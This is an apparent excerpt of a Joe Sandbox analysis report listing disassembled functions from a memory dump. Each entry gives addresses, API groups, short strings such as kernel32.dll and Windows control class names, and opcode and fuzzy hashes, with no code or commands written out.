                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                • API String ID: 3215553584-1196891531
                                                                                • Opcode ID: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                                                • Instruction ID: 79866f8fc0720a3bb6a7ae997c5939efa18d23b8bc7f521327b54c05bce17aa3
                                                                                • Opcode Fuzzy Hash: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                                                • Instruction Fuzzy Hash: 1881C272E2828285FBF96F369540AFDA6A0AF11745FC48135DA1E53684DF6CE870F221
                                                                                Function 00007FF79F89B1E8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 150COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: $*
                                                                                • API String ID: 3215553584-3982473090
                                                                                • Opcode ID: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
                                                                                • Instruction ID: e86b6ba7601bf154eddb459b89f8ef1045a42472ee5988d3521f21272017375f
                                                                                • Opcode Fuzzy Hash: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
                                                                                • Instruction Fuzzy Hash: 4D61633290C2C28AE7F5EE3484547BCB7E9EB45B18F941239C64A45199CF28F6E1F621
                                                                                Function 00007FF79F8DEAC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 127windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                • String ID: @
                                                                                • API String ID: 4150878124-2766056989
                                                                                • Opcode ID: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                                                • Instruction ID: 29be8a779bda21b83cacf625b0db0204fd57a1fe26e58645006c5f0154706557
                                                                                • Opcode Fuzzy Hash: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                                                • Instruction Fuzzy Hash: 2D51BD726186C192D760EB62E880AEEF760FBC8B94F810036EE4D53B59DEBCD505CB10
                                                                                Function 00007FF79F8AEAA8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                • String ID: U
                                                                                • API String ID: 2456169464-4171548499
                                                                                • Opcode ID: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                                                • Instruction ID: f329afd0087880565ad7fb69c9461210b3960ec87bb79e568596336d70bdf0fe
                                                                                • Opcode Fuzzy Hash: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                                                • Instruction Fuzzy Hash: 5341C522B1968182DB709F65E8447FAB7A0FB88794F844431EE4E87B88DF3CD412C750
                                                                                Function 00007FF79F91B454 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long
                                                                                • String ID: SysTreeView32
                                                                                • API String ID: 847901565-1698111956
                                                                                • Opcode ID: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                                • Instruction ID: 9a61f7d8a0fa97ba4e85099f85b7eb091940b0c68dafa73c773b5db3047e74d6
                                                                                • Opcode Fuzzy Hash: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                                • Instruction Fuzzy Hash: B4417E32609BC18AE770EF24A444B9AB3A1F784760F504335DAAC43B99CF3CD885CB50
                                                                                Function 00007FF79F91AB9C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$CreateObjectStock
                                                                                • String ID: SysMonthCal32
                                                                                • API String ID: 2671490118-1439706946
                                                                                • Opcode ID: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                                                • Instruction ID: def5287c2cdbcf0f190b92c7674dee439991229f542b7f3bedd066d511db6296
                                                                                • Opcode Fuzzy Hash: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                                                • Instruction Fuzzy Hash: 9B416E326086C28BE370DF25E444B9AF7A0FB887A0F504235EA9D43A98DF3CD4858F40
                                                                                Function 00007FF79F91B798 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$CreateDestroyObjectStock
                                                                                • String ID: msctls_updown32
                                                                                • API String ID: 1752125012-2298589950
                                                                                • Opcode ID: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                                                • Instruction ID: cd3e30b3e7fa7fd6b984e8759f04b7c67e80775c25a35b9165db698eb6826113
                                                                                • Opcode Fuzzy Hash: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                                                • Instruction Fuzzy Hash: 0E318E32A18BC596EB60DF25E4803AAB361FB85BA1F508136DA8D87B58CF3CD444CB10
                                                                                Function 00007FF79F8F4DF8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$InformationVolume
                                                                                • String ID: %lu
                                                                                • API String ID: 2507767853-685833217
                                                                                • Opcode ID: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                                • Instruction ID: 5a50b6d700749dbdfb7b42118030471105ecb12be97dd5e984f140ecba819b2e
                                                                                • Opcode Fuzzy Hash: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                                • Instruction Fuzzy Hash: 81319272608BC685DB60EB26E4805EDB761FB89BD0F904031EA8D47B69DF3CD5A5C710
                                                                                Function 00007FF79F91B104 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                • String ID: msctls_trackbar32
                                                                                • API String ID: 1025951953-1010561917
                                                                                • Opcode ID: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                                • Instruction ID: e3d0d37956c8edbcc01681666c284ba1a197a41b059891fadf169abcd0ec9120
                                                                                • Opcode Fuzzy Hash: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                                • Instruction Fuzzy Hash: 0831E732618AC18BE770DF25A444B9AB7A1FB887A0F514239EB9943B58CF3CD845CF14
                                                                                Function 00007FF79F8DF5CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
                                                                                • String ID: %s%d
                                                                                • API String ID: 2330185562-1110647743
                                                                                • Opcode ID: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                                • Instruction ID: d20f825cd43fff3ff1cf3521d7a17df555bd2fd0307c27e6f224ec3321a34b35
                                                                                • Opcode Fuzzy Hash: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                                • Instruction Fuzzy Hash: 9C215021618BC291EA64FB32E4406FEA361EF89BC4F948032DE9D47759DE2CE155D720
                                                                                Function 00007FF79F898782 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                • String ID: csm
                                                                                • API String ID: 2280078643-1018135373
                                                                                • Opcode ID: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                                • Instruction ID: b7073d36c2431a4ed30893ea94f54c6ef267ef8c1fb39ecace8f88e0daf556cc
                                                                                • Opcode Fuzzy Hash: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                                • Instruction Fuzzy Hash: AD21447660868283D670EF21E4405AEB761F789BA4F800236DE9D03795CF3CF896DB20
                                                                                Function 00007FF79F90AF20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF79F8D2DD1), ref: 00007FF79F90AF37
                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF79F8D2DD1), ref: 00007FF79F90AF4F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                • API String ID: 2574300362-1816364905
                                                                                • Opcode ID: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                                • Instruction ID: 641ec1944fd4a3c12d19b2a4d03f6e5903a8af7ef8a9c0a50e238b7e0be29631
                                                                                • Opcode Fuzzy Hash: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                                • Instruction Fuzzy Hash: 20F01261A15B45C1EF24AB31D8543E4A3E4FB48B29FD40435CA1C85358EF7CD558C350
                                                                                Function 00007FF79F9110C8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                • API String ID: 2574300362-4033151799
                                                                                • Opcode ID: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                                • Instruction ID: 5d13e8bc7491e743f422bc31aca066c2809f5c215e03c5c64fbbc1ff1cb8fbe2
                                                                                • Opcode Fuzzy Hash: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                                • Instruction Fuzzy Hash: 34E03921A09B4291FF24AB20A8643B8A3A4EB18B68F840431C91C85358EF7DD594C350
                                                                                Function 00007FF79F876D1C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 2574300362-1355242751
                                                                                • Opcode ID: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                                                • Instruction ID: dadb1483e0ee80452e2ba927841e1898c69d482b6e7ffb705d06f5415c639efc
                                                                                • Opcode Fuzzy Hash: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                                                • Instruction Fuzzy Hash: 7CE0ED6191AB4681EF25EB31E8543F467E0FB18B68F840434D91D85368EF7CD5A8C350
                                                                                Function 00007FF79F876D64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 2574300362-3689287502
                                                                                • Opcode ID: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                                • Instruction ID: 32e175d28ba1656adc6d3e6fc3075dda58c06a60e16bbb7319f2da7da289a9ba
                                                                                • Opcode Fuzzy Hash: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                                • Instruction Fuzzy Hash: 53E0ED61919F46C1EF24AB31E8583F463E4FB18B68F840435C91D85358EF7CE9A8C350
                                                                                Function 00007FF79F8E32F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                • API String ID: 2574300362-192647395
                                                                                • Opcode ID: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                                                • Instruction ID: e980a04b95d7fe84ac63fb30dcca84ab2a55fdaa1f5bd111ddb7599e14b79340
                                                                                • Opcode Fuzzy Hash: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                                                • Instruction Fuzzy Hash: A4E01261915B42C1EF24AB30E8547F463E0FB18B69FC40435C91D85358EFBCD5A4C350
                                                                                Function 00007FF79F8DB7E4 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                                • Instruction ID: 2beb646eefadeee5d72d2f11f97a0c0870fcd9151692fdc220879532e87da35c
                                                                                • Opcode Fuzzy Hash: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                                • Instruction Fuzzy Hash: 75D14676B04B9686EB649F36C8506AC77B4FB88F88B914422DF4D4BB58DF39D850D320
                                                                                Function 00007FF79F9079D8 Relevance: 6.3, APIs: 4, Instructions: 282COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
